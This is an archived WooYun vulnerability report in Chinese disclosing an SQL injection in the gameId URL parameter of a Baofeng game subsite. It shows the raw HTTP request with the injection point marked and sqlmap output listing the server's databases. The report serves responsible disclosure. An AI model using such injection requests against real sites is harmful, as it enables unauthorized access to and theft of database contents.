缺陷编号:WooYun-2015-0129756
漏洞标题:暴风游戏分站SQL注入(root权限)
相关厂商:暴风影音
漏洞作者:進撃のDanny
提交时间:2015-07-27 18:01
公开时间:2015-09-10 18:16
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
2015-07-27: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认,细节仅向厂商公开
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开
暴风游戏分站SQL注入(root权限)
1 2 3 4 5 6 7 8 9 |
GET /Game/gamedetail/gameId/12 HTTP/1.1<br> Host: wap.g.baofeng.com<br> Proxy-Connection: keep-alive<br> Cache-Control: max-age=0<br> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br> User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36<br> Accept-Encoding: gzip, deflate, sdch<br> Accept-Language: zh-CN,zh;q=0.8,en;q=0.6<br> Cookie: PHPSESSID=q8n3ddm3q6gfdt86alg2vrh7c5; Hm_lvt_34e5789c486dad0ff15ac5362a98ff71=1437962470; Hm_lpvt_34e5789c486dad0ff15ac5362a98ff71=1437989202 |
http://wap.g.baofeng.com:80/Game/gamedetail/gameId/12*gameId参数存在rewrite注入root权限可以获取任意数据。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
[17:31:50] [INFO] retrieved: xiaomingbf<br> available databases [12]:<br> [*] bf_7433<br> [*] h5akcc<br> [*] information_schema<br> [*] mysql<br> [*] performance_schema<br> [*] webbfsitegame<br> [*] websitegame<br> [*] webxiaoming<br> [*] xiaoming<br> [*] xiaomingad<br> [*] xiaomingbf<br> [*] xiaomingTest[17:31:59] [INFO] Fetched data logged to text files under 'D:\tools\sqlmap\outpu<br> t\wap.g.baofeng.com'[*] shutting down at: 17:31:59 |
过滤
危害等级:低
漏洞Rank:5
确认时间:2015-07-2718:14
感谢您提交的漏洞,我们会尽快修复。
暂无
原文连接
的情况下转载,若非则不得使用我方内容。